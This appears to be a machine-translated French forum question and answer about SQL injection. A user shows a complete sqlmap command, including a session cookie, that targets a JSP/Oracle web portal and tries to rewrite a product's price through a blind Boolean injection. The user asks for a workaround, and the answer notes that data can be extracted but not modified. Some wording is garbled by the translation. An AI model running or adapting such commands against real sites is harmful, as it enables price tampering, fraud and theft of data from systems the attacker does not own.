dOWN vote préféré, j'essaie d'utiliser le code suivant
sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price"
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'"
J'ai déjà vérifié ce lien avant et il est injectable en paramètre d'information (aveugle Boolean). Le résultat de l'exécution du code ci-dessus est:
warning: "execution of custom SQL queries is only available when stacked queries are supported"
Y a-t-il une solution de contournement pour faire cela?
Ce site Web est en cours d'exécution sur Apache, JSP et Oracle.
Pas de solution de contournement ici. Vous pouvez généralement jeter la base de la base de données avec une vulnérabilité d'injection SQL Boolean, mais vous ne pouvez pas effectuer des mises à jour.
Vous pouvez extraire mais ne peut pas insérer ni modifier les données existantes.